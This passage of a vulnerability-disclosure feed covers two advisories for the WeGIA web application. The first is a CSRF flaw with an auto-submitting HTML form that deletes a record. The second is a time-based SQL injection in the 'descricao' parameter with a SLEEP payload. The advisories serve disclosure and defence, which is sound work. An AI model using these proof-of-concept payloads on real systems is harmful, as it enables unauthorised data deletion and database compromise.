&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;metodo&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nomeClasse&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;id_almoxarifado&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-61604-cross-site-request-forgery-csrf-vulnerability-in-almoxarifadocontrole-class-delete-get-on-controlphp-endpoint&amp;#34;&amp;gt;CVE-2025-61604: Cross-Site Request Forgery (CSRF) Vulnerability in &amp;lt;code&amp;gt;AlmoxarifadoControle&amp;lt;/code&amp;gt; class Delete (GET) on &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61604&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61604&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. The delete operation for the &amp;lt;code&amp;gt;Almoxarifado&amp;lt;/code&amp;gt; entity is exposed via &amp;lt;code&amp;gt;HTTP GET&amp;lt;/code&amp;gt; without CSRF protection, allowing a third-party site to trigger the action using the victim’s authenticated session.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /WeGIA/controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;metodo&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nomeClasse&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;id_almoxarifado&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61604/image.png&amp;#34;
	width=&amp;#34;1498&amp;#34;
	height=&amp;#34;644&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61604/image_hu_f5b0e3c8457f44d8.png 480w, /p/cve-2025-61604/image_hu_a02351acbaeffe3e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;232&amp;#34;
		data-flex-basis=&amp;#34;558px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61604/image-1.png&amp;#34;
	width=&amp;#34;775&amp;#34;
	height=&amp;#34;456&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61604/image-1_hu_fe77fb317ebe37c3.png 480w, /p/cve-2025-61604/image-1_hu_443e426826577324.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;169&amp;#34;
		data-flex-basis=&amp;#34;407px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Top-Level Navigation (works even with SameSite=Lax)&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Host the file below from a different origin and open it while logged into WeGIA (ex: &amp;lt;code&amp;gt;poc_csrf_get.html&amp;lt;/code&amp;gt;):&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cp&amp;#34;&amp;gt;&amp;amp;lt;!doctype html&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;html&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;body&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;form&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;id&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;f&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;method&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;GET&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;action&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;https://sec.wegia.org:8000/WeGIA/controle/control.php&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;target&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;_self&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;      &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;input&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;type&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;hidden&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;metodo&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;value&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;excluir&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;      &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;input&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;type&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;hidden&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;nomeClasse&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;value&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;AlmoxarifadoControle&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;      &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;input&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;type&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;hidden&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;id_almoxarifado&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;value&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;{choose a ID}&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;form&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;getElementById&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;f&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;).&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;submit&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;();&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;body&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;html&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Sign in to WeGIA with a user allowed to delete &amp;lt;code&amp;gt;Almoxarifado&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;From another origin (e.g., &amp;lt;code&amp;gt;http://127.0.0.1:8008&amp;lt;/code&amp;gt;), open the PoC HTML above.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Observe WeGIA executing the delete flow (e.g., FK error or normal delete), proving a cross-site request can trigger the action.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Integrity compromise: Attackers can induce privileged users to perform destructive actions by visiting an attacker-controlled page.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potential data loss or operational disruption if IDs not protected by FK constraints are targeted.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-59hm-4m9h-ch3m&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-59hm-4m9h-ch3m&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 02 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-61605</title>
        <link>https://www.cvehunters.com/p/cve-2025-61605/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-61605/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-61605-sql-injection-blind-time-based-vulnerability-in-descricao-parameter-on-controlecontrolphp-endpoint&amp;#34;&amp;gt;CVE-2025-61605: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61605&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61605&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt; endpoint. This issue allows any attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-61605-sql-injection-blind-time-based-vulnerability-in-descricao-parameter-on-controlecontrolphp-endpoint&amp;#34;&amp;gt;CVE-2025-61605: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61605&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61605&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt; endpoint. This issue allows any attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;%20AND%20SLEEP(5)%20AND%20&amp;amp;#39;1&amp;amp;#39;%3D&amp;amp;#39;1&amp;amp;#39;--%20-
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61605/image.png&amp;#34;
	width=&amp;#34;1530&amp;#34;
	height=&amp;#34;710&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61605/image_hu_14dc839ca21520de.png 480w, /p/cve-2025-61605/image_hu_b816c8af74ba98e7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;215&amp;#34;
		data-flex-basis=&amp;#34;517px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v8hm-pq8g-c7j4&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v8hm-pq8g-c7j4&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
